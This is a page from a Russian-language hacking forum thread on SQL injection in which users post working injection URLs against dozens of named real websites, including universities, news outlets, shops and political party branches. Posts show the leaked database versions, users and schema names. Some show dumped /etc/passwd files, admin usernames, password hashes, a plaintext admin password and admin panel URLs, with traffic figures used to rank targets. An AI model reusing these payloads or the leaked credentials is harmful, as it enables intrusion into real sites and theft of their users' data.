PDA

Просмотр полной версии : SQL Инъекции


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 [65]

grimnir
17.02.2015, 20:26
http://www.fbcinverness.com/events.php
?id=7' and 999999.9 union all select 1,concat(version(),0x3a,user()),3,4,5,6,7,8,9,10 and '1'='1


5.5.40-cll:fbcinver_user@localhost


http://www.federalpolyidah.edu.ng/details.php ?page_id=2 &site_id=999999.9 union all select 1,2,concat(version(),0x3a,user()),4,5,6,7,8,9,10,1 1,12,13


5.1.73-cll:federalp_segun@localhost

nemaniak
18.02.2015, 19:23
wwcc.edu PR-5


Code:
http://www.wwcc.edu/CMSX/main.php?module=department&collegecode=200&deptcode=ELEC' AND (SELECT 8494 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(concat_ws(0x3a,versio n(),user(),database()),0x20)),1,50)),FLOOR(RAND(0) *2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hDoK'='hDoK



Code:
5.1.73-log:phpviewer@www.wwcc.edu:catalog1


giveawaytab.com 9k трафа


Code:
http://giveawaytab.com/giveaway2/mobile.php?pageid=-9199'+union+select+ NULL,NULL,NULL,version(),NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL%23



Code:
5.1.73-log


isnap.com 10k трафа


Code:
http://www.isnap.com/desktop/event.php?q=1&id=1-999.9+union+select+111,222,333,444,555,6666,@@vers ion,888+--+



Code:
Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2) (Hypervisor)


quotationspage.com PR-6 50k трафа


Code:
http://quotationspage.com/books.php3?category=-special'+union+select+1,2,concat_ws(0x3a,version() ,user(),database()),4+--+



Code:
5.0.95:quotes@localhost:quotes

kingbeef
19.02.2015, 04:26
Code:
http://www.aza.com.ua/servis/view1.html?id=-741+union+select+1,2,concat_ws(%27:%27,user(),vers ion(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20+from+mysql.user--+k

root@localhost:5.5.17:test

MQ off

File_priv Y

grimnir
19.02.2015, 11:57
http://wwwb.thenewstribune.com/business/new_business/details.php
?id=-2420 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(ver sion(),0x3a,user()),NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL#


5.0.45-community-nt-logublic@192.168.254.12

PR6 987K траффа тИЦ 140


http://www.cameroon-info.net/cin_specials.php?sp_id=9%20UNION%20ALL%20SELECT%20 NULL%2CCONCAT%280x716a626b71%2CIFNULL%28CAST%28ver sion%28%29%20AS%20CHAR%29%2C0x20%29%2C0x71786a7671 %29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNU LL%2CNULL%2CNULL%23


вывод на странице qjbkq5.5.40-cll

1.25M траффа


http://www.berghahnbooks.com/v1/series.php ?pg=1999999.9'+/**/uNiOn/**/aLl+/**/sElEcT+1,2,/**/cOnCaT(0x217e21,/**/cOnCaT(/**/uSeR(),0x332150,/**/vErSiOn(),0x332150,/**/dAtAbAsE()),0x217e21),4,5,6,7+and+'0'='0


berghahn_jb001@localhost3!P5.5.40-cll3!Pberghahn_berghahn!~!


http://www.monteclarkgallery.com/exhibition_images.php?id=(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+/**/cOnCaT(0x217e21,/**/vErSiOn(),0x217e21))+/**/fRoM+information_schema./**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema./**/tAbLeS+/**/gRoUp/**/bY+x)a)


errorbased Duplicate entry '!~!5.1.68!~!1'

palec2006
23.02.2015, 22:40
http://www.intermedia.ru/news/-1'and+extractvalue(1,concat(0x3a,(select(group_con cat(version())))))and'


5.1.73

ТИЦ:900

PR:4

Live Int:2750

админка гдето у индийских кодеров потерялась

MaxFast
24.02.2015, 15:00
"ОБЩЕСТВЕННО-ПОЛИТИЧЕСКИЙ ЖУРНАЛ ФЕДЕРАЛЬНОГО СОБРАНИЯ — ПАРЛАМЕНТА РФ"


Code:
http://www.russia-today.ru/index.php?idn=-359 union select 1,concat(user(),0x3a,version(),0x3a,database()),3, 4,5,6,7,8,9--

u260343@10.8.4.36:5.5.35-1+wheezy1+mh1-log:u260343_osn

тИЦ: 1200

grimnir
24.02.2015, 20:41
http://gunnars.com/product_grids.php
?function=indoor0'+and(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+/**/cOnCaT(0x217e21,/**/uSeR(),0x217e21))+/**/fRoM+information_schema./**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema./**/tAbLeS+/**/gRoUp/**/bY+x)a)+and+'1'='1
&category=gaming


Популярные очки для компьютера 590k траффа ,вывод ошибок в исходном коде страницы

ERROR: $query. Duplicate entry '!~!admin13@localhost!~!1' for key 'group_key

version:5.5.30

MaxFast
25.02.2015, 18:35
http://mplo48.ru/images/site/logoTEXT.png


Code:
http://mplo48.ru/?module=news&id=-710' union select 1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0x3a, database()) --

mplo48_root@localhost:5.1.73:mplo48_root

КПРФ Томск


Code:
http://kprf.tomsk.ru/photos/-1713' union all select concat(user(),0x3a,version(),0x3a,database()) -- /

kprfwww@hosting.tomica.ru:5.0.92-log:kprfwww

Вывод в meta name="description"

http://www.otvprim.ru/img/logo_null.png


Code:
http://www.otvprim.ru/programs?id2=-304 union select 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,ver sion()),8,9,10,11,12--

admin_otv@localhost:admin_otv:5.5.41-0+wheezy1-log

faza02
27.02.2015, 12:41
Code:
http://www.bu.edu/dbin/eng/announcements/view.php?id=-117+union+select+1,2,3,4,unhex(hex(cal_passwd)),6, 7+from+webcal_user+limit+1,1

4.1.14-standard-log

ТИЦ 850 PR 7 ALEXA 4311

найденные таблицы:


Code:
webcal_config
webcal_entry_log
webcal_site_extras
webcal_user
certificates
reviews
webcal_report
webcal_report_template
announcements
seniors

MaxFast
28.02.2015, 16:45
Тверское отделение ЛДПР


Code:
http://ldprtver.ru/events.php?id=-9328 uNiOn aLl sElEcT 1,cOnCaT(user(),0x3a,version(),0x3a,database()),3, 4--

ldprtver_mysql@10.3.100.225:5.1.41-log:ldprtver_db

psihoz26
04.03.2015, 19:57
Code:
http://www.shop.mpkpru.ru/public/places_personnel.php?id=619999912'+union+select+1, 2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,version(),25,26,27,28,29,30,31,32+--+

root@localhost

5.1.61


Code:
http://rosmir.iriran.ru/party.php?id=-102%27+union+select+1,2,3,4,5,load_file(%27/etc/passwd%27),7,concat(user(),0x3a,version()),9,10,11 ,12,13,14,15,16,17+--+

root@localhost

5.5.31

grimnir
05.03.2015, 10:31
http://www.coffeebean.com.sg/coffeebean/showcat2.cfm
?CFID=18465720
&CFTOKEN=0'+or+1=/**/cOnVeRt(int,(char(33)+char(126)+char(33)+(/**/cAsT(/**/dB_NaMe()+as+nvarchar))+char(33)+char(126)+char(33 )))--


error based cid_clientvariablestore@Microsoft SQL Server 2000 - 8

palec2006
07.03.2015, 02:26
ТИЦ:8500

PR:4

траф 100к+


http://tonkosti.ru/itourism/?p=5401&article=-1+union+all+select(array_to_string(ARRAY(select+ta ble_name||chr(46)||column_name||chr(60)||chr(98)|| chr(114)||chr(62)+from+information_schema.columns+ where+table_schema=%27tonkosti%27),%27,%27))


http://tonkosti.ru/

http://reestr-ta.ru/

http://pro.tonkosti.ru/

http://reklama.travel/

PHP 5.3.29

PostgreSQL 9.3.3 on x86_64-unknown-linux-gnu, compiled by gcc (GCC) 4.6.3 20120306 (Red Hat 4.6.3-2), 64-bit

MediaWiki и vBulletin примотанные к какому-то самопису

хэши HMAC-MD5(key = $salt) (формат для hashcat - хэш:логин)

http://admin.tonkosti.ru/

http://pro.tonkosti.ru/talk/manage/

http://reestr-ta.ru/admin/

http://reestr-ta.ru/server-info

http://reestr-ta.ru/?p=5/../../search_help

MaxFast
08.03.2015, 11:40
Code:
http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/etc/passwd'),3,4--



Code:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/adm:/bin/false lp:x:4:7:lp:/var/spool/lpd:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/bin/false news:x:9:13:news:/usr/lib/news:/bin/false uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false operator:x:11:0:operator:/root:/bin/bash man:x:13:15:man:/usr/share/man:/bin/false postmaster:x:14:12:postmaster:/var/spool/mail:/bin/false smmsp:x:209:209:smmsp:/var/spool/mqueue:/bin/false portage:x:250:250:portage:/var/tmp/portage:/bin/false nobody:x:65534:65534:nobody:/:/bin/false sshd:x:22:22:added by portage for openssh:/var/empty:/sbin/nologin cron:x:16:16:added by portage for cronbase:/var/spool/cron:/sbin/nologin ftp:x:21:21:added by portage for ftpbase:/home/ftp:/sbin/nologin ldap:x:439:439:added by portage for openldap:/usr/lib/openldap:/sbin/nologin clamav:x:101:1002:added by portage for clamav:/dev/null:/sbin/nologin mysql:x:60:60:added by portage for mysql:/dev/null:/sbin/nologin apache:x:81:81:added by portage for apache:/var/www:/sbin/nologin postgres:x:70:70:added by portage for postgresql:/var/lib:/bin/bash dbmail:x:102:1003:added by portage for dbmail:/var/lib/dbmail:/sbin/nologin razor:x:1000:1004::/home/razor:/bin/bash reser:x:1001:1005::/home/reser:/bin/bash syncer:x:1002:1006::/home/syncer:/bin/bash

grimnir
10.03.2015, 19:07
http://www.christianjobwire.com/job/151715%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,concat%28version%28%29,0x3a,user% 28%29%29,NULL,NULL,NULL,NULL,NULL--%20.html


вывод внизу страницы 5.1.73-1:christianjobwire@10.208.38.175

palec2006
12.03.2015, 09:23
ТИЦ:210

PR:5

траф 30к


http://www.pulset.ru/club/statya.php?id_st=1*(ascii(substring((select+versio n()),1,1)))
смотрим id соответствующей статьи




http://www.pulset.ru/club/statya.php?id_st=15*(IF(ascii(substring((select+ve rsion()),1,1))+between+53+AND+54,5,2))
id_st=75 - TRUE


version:

5.5.41-MariaDB-1 squeeze-log

user:

club_media@localhost

database:

club_media

MaxFast
12.03.2015, 10:10
http://www.russia-review.ru/img/logo.png


Code:
http://www.russia-review.ru/find.php?uid=1&fnd=-1' union select 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,ver sion()),8,9,10,11,12,13--

trwcm@localhost:wciom_tr:5.5.38

grimnir
12.03.2015, 15:10
http://news.singtao.ca/toronto/show_news.php?ID=9%20UNION%20ALL%20SELECT%20NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT%28ve rsion%28%29,0x3a,user%28%29%29,NULL--


трафф 570к корейцы в Канаде

ubuntu0.12.04.1-log:cmspro@54.235.156.247

''@'cms.singtao.ca'

''@'localhost'

'aitdev'@'%'

'ccue168'@'174.129.110.83'

'ccue168'@'23.20.187.239'

'ccue168'@'54.196.138.32'

'cmspro'@'%'

'cmspro'@'10.109.151.12'

'cmspro'@'10.157.0.40'

'cmspro'@'10.182.228.236'

'cmspro'@'10.231.168.34'

'cmspro'@'174.129.110.83'

'cmspro'@'216.250.115.119'

'cmspro'@'23.20.187.239'

'cmspro'@'54.196.138.32'

'cmspro'@'54.235.156.247'

'cmspro'@'54.235.74.234'

'cmspro'@'54.83.0.184'

'cmspro'@'74.208.110.10'

'cmspro'@'74.208.163.140'

'cmspro'@'ip-10-109-151-12.ec2.internal'

'cmspro'@'ip-10-170-19-124.ec2.internal'

'cmspro'@'ip-10-182-228-236.ec2.internal'

'cmspro'@'ip-10-28-191-150.ec2.internal'

'cmspro'@'localhost'

'cmsreal'@'54.235.156.247'

'cmsreal'@'54.235.74.234'

'cmsreal'@'localhost'

'debian-sys-maint'@'localhost'

'root'@'127.0.0.1'

'root'@'::1'

'root'@'cms.singtao.ca'

'root'@'localhost'

'vote'@'10.157.0.40'

'vote'@'ip-10-170-19-124.ec2.internal'

DezMond™
13.03.2015, 12:42
PR8

http://www.hochschulkompass.de/studium/suche/profisuche/search/1/studtyp/3.html?tx_szhrksearch_pi1%5Bxtend%5D=1&tx_szhrksearch_pi1%5Bbundesland%5D%5B0%5D=2&tx_szhrksearch_pi1%5Bresults_at_a_time%5D=100&tx_szhrksearch_pi1[pointer]=1&tx_szhrksearch_pi1[detail]=all&tx_szhrksearch_pi1%5Bbesform%5D%5B0%5D=d'+union+se lect+null,datname+from+pg_database+--

Unknown
14.03.2015, 16:27
Code:
http://www.vs.com.ua/a-news/news.php?id=-18+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,0x4861636b6564206279205365706f,7 ,8,9,10--

grimnir
15.03.2015, 13:16
http://hsa.healthcaresource.com/survey/invite_welcome.php?code=e4c36c2d265b4e22aeb736b9e3 2b3b390'+and(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+/**/cOnCaT(0x217e21,/**/dAtAbAsE(),0x217e21))+/**/fRoM+information_schema./**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema./**/tAbLeS+/**/gRoUp/**/bY+x)a)+and+'1'='1


error based hsi_production 5.1.73 testrsce@ww1036.prod.local

Трафф2.4кк софт для здравохранения США

web server operating system: Linux CentOS 6.5

web application technology: PHP 5.3.3, Apache 2.2.15

back-end DBMS: MySQL >= 5.0.0

available databases [6]:

hcti_production

hli_production

hsi_production

information_schema

test

testsourcedotcom_production

Unknown
15.03.2015, 19:12
Футбольная Федерация Анголы


Code:
http://www.fafutebol-angola.og.ao/noticias/noticias.php?id=-147+union+select+concat_ws(0x3a,version(),user(),d atabase()),2--

faza02
18.03.2015, 13:56
Code:
https://owl.english.purdue.edu/engagement/index.php?article_id=29%27+div+0+union+select+1,ve rsion%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24--+

5.5.42-log

ТИЦ 100 PR 8 AR 1911

C@T
18.03.2015, 22:36
Code:
http://vlasti.net/wp-content/plugins/comment-rating/ck-processkarma.php?id=-2 or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast( user_login as char),0x7c,0x7c,0x7c, cast( user_pass as char),0x27,0x7e)) FROM wp3.wp_users limit 1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)&action=add&path=a&imgIndex=1_15_

Тиц: 2400

PR: 5

User: root@localhost

MaxFast
19.03.2015, 13:10
Code:
http://www.pervayapomosh.com/list.php?bukva=-2222222222222' /*!union select*/ 1,concat(user(),0x3a,database(),0x3a,version()),3, 4--

doconlin_admin@localhost:doconlin_pp:5.5.42-cll

MaxFast
23.03.2015, 13:32
http://www.press-service.ru/images/logo_press-service.gif


Code:
http://www.press-service.ru/archive/?act=view&id=-136' union select 1,2,3,4,5,concat(user(),0x3a,database(),0x3a,versi on()),7 --

almanahi_main@localhost:almanahi_imagemedia:5.5.41-cll-lve

OxoTnik
26.03.2015, 20:34
http://www.urtk-mephi.ru/img/Top2.png

http://www.urtk-mephi.ru/pages.php?id=-12+union+select+1,version()

5.1.52-log

teh
27.03.2015, 03:05
http://cvetnik.com.ua/a-articles/article.php?id=-18%20union%20select%201,2,concat%280x3c62723e,vers ion%28%29,0x3c62723e,user%28%29,0x3c62723e,databas e%28%29%29,4,5,6,7,8,9,10,11,12,13,14--

5.0.77

cvet@localhost

cvetnik

http://bratya-tsyplyata.ru/product.php?id=-996%20union%20select%201,concat%280x3c62723e,versi on%28%29,0x3c62723e,user%28%29,0x3c62723e,database %28%29%29,3,4,5,6,7,8,9,10,11,12,13,14--

5.1.73-log

viraru_bra@localhost

viraru_bra

http://library.umd.umich.edu/Find/cat.php?cat=Reference%20union%20select%20concat%28 version%28%29,0x3c62723e,user%28%29,0x3c62723e,dat abase%28%29%29,2,3,4,5,6--

5.0.95-log

research@libraryweb.its.umd.umich.edu

Research

Unknowhacker
02.04.2015, 15:29
http://www.onua.edu.ua/templates/ja_ores/images/light-blue/logo.png


Code:
http://www.onua.edu.ua/index.php?option=com_content&view=article&id=2364+or+1+group+by+concat%28version%28%29,floor %28rand%280%29*2%29%29having+min%280%29+or+1+--+&catid=1&Itemid=138&lang=ru

Версия: 5.6.14-log1

Engine: Joomla 1.5

teh
03.04.2015, 00:00
Code:
http://eng.tspu.edu.ru/shou_biog_sotr.php?id=-1282 union select 1,user(),3,4,5,version(),7,8,9,database(),11,12,13--



10.0.16-MariaDB-log

polevivan@localhost

engtspu1

WallHack
03.04.2015, 08:10
Система активной рекламы


Code:
http://revda-bux.ru/news.php?id=-1%27+union+select+1,2,password,email+from+tb_users +--+

5.5.41-0ubuntu0.12.04.1

mixan_2@localhost

Админка


Code:
http://revda-bux.ru/admin

MaxFast
05.04.2015, 10:18
danil7493 said:
↑ (https://antichat.live/posts/3834744/)
http://www.aql.uz/articles.php?cat=18
'
http://www.aql.uz/admin/
login leonardo1024 pass 102432768
http://nigoh.uz/admin/
login nigohuz
pass iKROMbAXMAL86




Code:
http://www.aql.uz/articles.php?cat=18'+and+extractvalue(1,concat(0x3 a,(select+version())))+--+

XPATH syntax error: ':5.5.42-cll'

WallHack
06.04.2015, 12:05
Code:
http://www.cniim.com/tech.php?id=-30+union+select+1,version()+--+

5.0.75-log

ho5336_cniim@83.243.78.2


Code:
http://www.cniim.com/admin/

Яндекс тИЦ 30 Google Page Rank 1

totenkopf
09.04.2015, 21:45
Пиндосия


Code:
http://www.dodgebyowner.com/property-single.cfm?pid=1205+limit+0+UNION+SELECT+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,concat_ws(0x3a,user(),ve rsion(),database()),50,51,52,53,54,55,56,57,58,59, 60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76 ,77,78+--+

dodgebyowner@xwdz1.dailyrazor.com (mailto:dodgebyowner@xwdz1.dailyrazor.com):5.5.18: design08_dodgebyowner


Code:
http://www.explorekansas.org/page.php?id=140'+limit+0+/*!UNION*/+/*!SELECT*/+1,2,3,concat_ws(0x3a,user(),version(),database()) +--+

sampler_mkiHHp1@localhost:5.0.96-community:sampler_kstblz1


Code:
http://www.franklincountyiowa.com/category_details.php?sid=10+limit+0+UNION+SELECT+1 ,2,concat_ws(0x3a,user(),version(),database()),4,5 ,6,7,8+--+

521613_fcdaia@172.17.2.255:5.1.70-log:521613_fcdaia


Code:
http://www.fuddruckers.com/local/location.php?s=379'+limit+0+UNION+SELECT+concat_ws (0x3a,0x273E3C68313E,user(),version(),database())+--+

518111_Afdfnl8js@72.3.189.48:5.1.61-log:518111_FuddsDev


Code:
http://www.indianamri.com/index.php?page=Indiana_MRI_Bloomington_-_MRI_Services_for_Bloomington_and_Southern_Indiana _Magnetic_Resonance_Imaging&menu_id=1'+limit+0+UNION+SELECT+1,concat_ws(0x3a,u ser(),version(),database())+--+

indianamri_admin@carroll.dreamhost.com (mailto:indianamri_admin@carroll.dreamhost.com):5. 1.56-log:indianamri


Code:
http://www.itamed.com/mcms/itamedt/content.cfm?pulldata=scmsmembers.cfm&function=members&perform=memberappita&entity_id=11+limit+0+UNION+SELECT+1,2,concat_ws(0x 3a,user(),version(),database()),4,5,6,7,8,9,10+--+

itamed1@10.10.1.34:5.6.23-log:itamed1


Code:
http://www.lhnmedia.com/detail.php?t=1409+limit+0+UNION+SELECT+1,2,concat_ ws(0x3a,user(),version(),database()),4,5,6,7,8,9,1 0,11,12,13,14,15+--+

luth@localhost:5.0.24:lutheran


Code:
http://www.littlemomentsbigmagic.com/index.php?title=About-Us&cat=11'+limit+0+UNION+SELECT+1,2,concat_ws(0x3a,us er(),version(),database())+--+

bbbsmapuser@10.30.75.195:5.0.91:bbbscontent


Code:
http://www4.aacrao.org/publications/catalog.php?item=0141'+limit+0+UNION+SELECT+1,2,co ncat_ws(0x3a,user(),version(),database()),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30+--+

publicationsuser@localhost:5.5.38ublications


Code:
http://accessnca.org/index.php?id=4+limit+0+UNION+SELECT+1,2,3,4,5,conc at_ws(0x3a,user(),version(),database()),7,8,9,10,1 1,12,13+--+

anc2009@97.74.144.172:5.0.96-log:anc2009

WallHack
10.04.2015, 06:25
Русский интернет магазин часов


Code:
http://www.agiperwatch.ru/new.php?id=-40%27+union+select+1,version(),3,4,5,6+--+

Version 5.1.49-3

User root@localhost


Code:
Db User & Pass: root:*10B1BEE157125F829776C8185F0211EC318BC8B2:loc alhost
Compile OS: debian-linux-gnu
Db User & Pass: root:*10B1BEE157125F829776C8185F0211EC318BC8B2:deb ian-6-64-isplite.ru
Db User & Pass: root:*10B1BEE157125F829776C8185F0211EC318BC8B2:127 .0.0.1
Db User & Pass: debian-sys-maint:*C071BEEA66158840BB2AADF24693F0BCBCE185CD:lo calhost

Яндекс тИЦ 30 Google Page Rank 1

danil7493
10.04.2015, 15:31
Code:
http://www.minddesign.co.uk/show.php?id=4832'+union+all+select+1,2,3,concat(0x 217e21,concat(user(),0x332150,version(),0x332150,d atabase()),0x217e21),5,6,7,8,9,10,11,12,13,14,15,1 6+--+
!~!jacobs_mddata@localhost3!P5.6.233!Pjacobs_mddat a!~!

http://www.carnegiegreenaway.org.uk/shadowingsite/review.php?id=999999.9+union+all+select+concat(0x3 d7e3d,concat(user(),0x332150,version(),0x332150,da tabase()),0x3d7e3d),2,3,4,5,6
=~=admin_ckg@localhost3!P5.1.73-cll3!Padmin_ckg=~=
http://www.carnegiegreenaway.org.uk/shadowingsite/review.php?id=999999.9+union+all+select(select+con cat(0x3d7e3d,ifnull(user,char(32)),0x332150,ifnull (pass,char(32)),0x3d7e3d)+from+admin_ckg.users+lim it+0,1),2,3,4,5,6
=~=admin3!P$2a$08$GAaYWnA0dyo2cI0fvPYGBeSM1bnm1682 zNwGowdigO85eGN9hDbu.=~=

http://membr.uwm.edu/review.php?id=999999.9+union+all+select+1,concat(0 x3d7e3d,concat(user(),0x332150,version(),0x332150, database()),0x3d7e3d),3

http://urc.tauniverse.com/db/review.php?ID=-2577+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,concat(0x3d7e3d,concat(user(),0x332150,ver sion(),0x332150,database()),0x3d7e3d),17,18,19,20, 21,22,23,24,25
=~=urc_urc@localhost3!P5.1.73-cll3!Purc_reviews=~=

https://playlotto.co.ug/mediafiles/media-draw.php?id=999999.9+union+all+select+1,2,3,4,5,6, 7,8,9,concat(0x3d7e3d,concat(user(),0x3d213d,versi on(),0x3d213d,database()),0x3d7e3d),11,12,13,14,15 ,16,17,18,19,20,21
=~=playlmnqrd_2@www38.cpt1.host-h.net=!=5.5.41-0+wheezy1=!=playlmnqrd_db2=~=

https://playlotto.co.ug/mediafiles/media-draw.php?id=999999.9+union+all+select+1,2,3,4,5,6, 7,8,9,(select+concat(0x3d7e3d,ifnull(id,char(32)), 0x3d213d,ifnull(username,char(32)),0x3d213d,ifnull (passw,char(32)),0x3d7e3d)+from+playlmnqrd_db2.use rs+limit+0,1),11,12,13,14,15,16,17,18,19,20,21
=~=1=!=admin=!=uglotto987=~=

http://seekdl.org/conferences_page_papers.php?confid=999999.9'+union +all+select+1,2,3,4,5,concat(0x3d7e3d,concat(user( ),0x3d213d,version(),0x3d213d,database()),0x3d7e3d ),7,8,9,10,11,12,13,14,15+and+'0'='0
=~=ibmhgxtv_seeknew@localhost=!=5.5.42-cll=!=ibmhgxtv_seeknew=~=

http://www.harbor.ru/catalogue/cat.php?id=3'+union+all+select+1,concat(0x3d7e3d,c oncat(user(),0x3d213d,version(),0x3d213d,database( )),0x3d7e3d),3+and+'0'='0
=~=u367687@10.8.3.102=!=5.5.35-1+wheezy1+mh1-log=!=u367687_catalog=~=

http://www.harbor.ru/catalogue/cat.php?id=3'+union+all+select+1,(select+concat(0x 3d7e3d,ifnull(userid,char(32)),0x3d213d,ifnull(use rname,char(32)),0x3d213d,ifnull(password,char(32)) ,0x3d213d,ifnull(passworddate,char(32)),0x3d213d,i fnull(email,char(32)),0x3d213d,ifnull(salt,char(32 )),0x3d7e3d)+from+u367687.user+limit+0,1),3+and+'0 '='0
=~=1=!=Liliya_Gorina=!=28d329b3b119754282c7d4478fb e55da=!=2013-01-19=!=inform@harbor.ru=!=nR}=~= и тд 160к

http://norramore.se/nm.php?id=999999.9'+union+all+select+1,2,3,4,5,con cat(0x3d7e3d,user(),0x3d7e3d,version(),0x3d7e3d,da tabase(),0x3d7e3d),7+and+'0'='0
=~=norramore@n99383@s476.loopia.se=~=5.5.34-log=~=norramore_se=~=

http://www.lakra-products.ru/sert.php?id=999999.9+union+all+select+1,2,3,4,5,co ncat(0x3d7e3d,user(),0x3d7e3d,version(),0x3d7e3d,d atabase(),0x3d7e3d),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62
=~=lakra_mysql@212.193.231.168=~=5.1.41-log=~=lakra_products=~=

http://www.lonergan.at/philo/sert.php?ID=999999.9+union+all+select+concat(0x3d7 e3d,user(),0x3d7e3d,version(),0x3d7e3d,database(), 0x3d7e3d)
=~=www00572@localhost=~=5.5.41-0=~=usrdb_www00572=~=

http://www.trishasattic.com/lot.php?id=26+union+all+select+1,2,3,4,concat(0x3d 7e3d,user(),0x3d7e3d,version(),0x3d7e3d,database() ,0x3d7e3d),5,6,7
$=~=trishas_attic@10.20.112.18=~=5.5.32-log=~=trishas_attic=~=

http://norramore.se/nm.php?id=999999.9'+union+all+select+1,2,3,4,5,con cat(0x3d7e3d,user(),0x3d7e3d,version(),0x3d7e3d,da tabase(),0x3d7e3d),7+and+'0'='0
=~=norramore@n99383@s476.loopia.se=~=5.5.34-log=~=norramore_se=~=

http://kvartira.remc.ru/lot.php?id=999999.9+union+all+select+1,concat(0x3d 7e3d,user(),0x3d7e3d,version(),0x3d7e3d,database() ,0x3d7e3d),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20
=~=b2boffice_ru@zvm24.host.ru=~=5.5.30-log=~=b2boffice_ru=~=

http://www.casa-de-lujo.com/lot.php?id=135'+and(select+1+from(select+count(*), concat((select(select+concat(0x3d7e3d,user(),0x3d7 e3d,version(),0x3d7e3d,database(),0x3d7e3d))+from+ information_schema.tables+limit+0,1),floor(rand(0) *2))x+from+information_schema.tables+group+by+x)a) +and+'1'='1
=~=casadelujo_main@localhost=~=5.5.36-34.0-632.precise=~=

http://www.rennesencheres.com/lot.php?id=(select+1+from(select+count(*),concat(( select(select+concat(0x3d7e3d,user(),0x3d7e3d,vers ion(),0x3d7e3d,database(),0x3d7e3d))+from+informat ion_schema.tables+limit+0,1),floor(rand(0)*2))x+fr om+information_schema.tables+group+by+x)a)
'=~=bretagne_enchere@localhost=~=5.1.73-1=~=bretagne_enchere=~=1'

http://technotronik.kz/lot.php?id=999999.9+union+all+select+binary(concat (0x3d7e3d,concat(user(),0x3d213d,version(),0x3d213 d,database()),0x3d7e3d))
=~=v_4656_shopi@localhost=!=5.5.42-cll-lve=!=v_4656_shopi=~=

http://www.compagniaperlamusica.com/iniziativa.php?id=(select+1+from(select+count(*),c oncat((select(select+concat(0x3d7e3d,user(),0x3d7e 3d,version(),0x3d7e3d,database(),0x3d7e3d))+from+i nformation_schema.tables+limit+0,1),floor(rand(0)* 2))x+from+information_schema.tables+group+by+x)a)
=~=cplmusr@localhost=~=5.0.51a-24+lenny5-log=~=

http://www.cgilparma.it/CGILPR_Portal/CGILPR_pubblico/iniziativa.php?in=999999.9+union+all+select+1,2,3, 4,concat(0x3d7e3d,concat(user(),0x3d213d,version() ,0x3d213d,database()),0x3d7e3d),6,7,8,9,10,11,12,1 3,14--
=~=PL2098_guest_pub@81.88.55.168=!=4.1.23-pro-log=!=cgilparma_it_data=~=

http://centroiniziativecodroipo.altervista.org/iniziativa.php?id=999999.9+union+all+select+1,2,3, 4,5,concat(0x3d7e3d,concat(user(),0x3d213d,version (),0x3d213d,database()),0x3d7e3d),7,8,9,10,11,12,1 3
=~=2531268@localhost=!=5.1.71-community-log=!=my_centroiniziativecodroipo=~=

http://cicodroipo.altervista.org/iniziativa.php?id=-57+union+all+select+1,2,3,4,5,6,concat(0x3d7e3d,co ncat(user(),0x3d213d,version(),0x3d213d,database() ),0x3d7e3d),7,8,9,10,11,12,13--
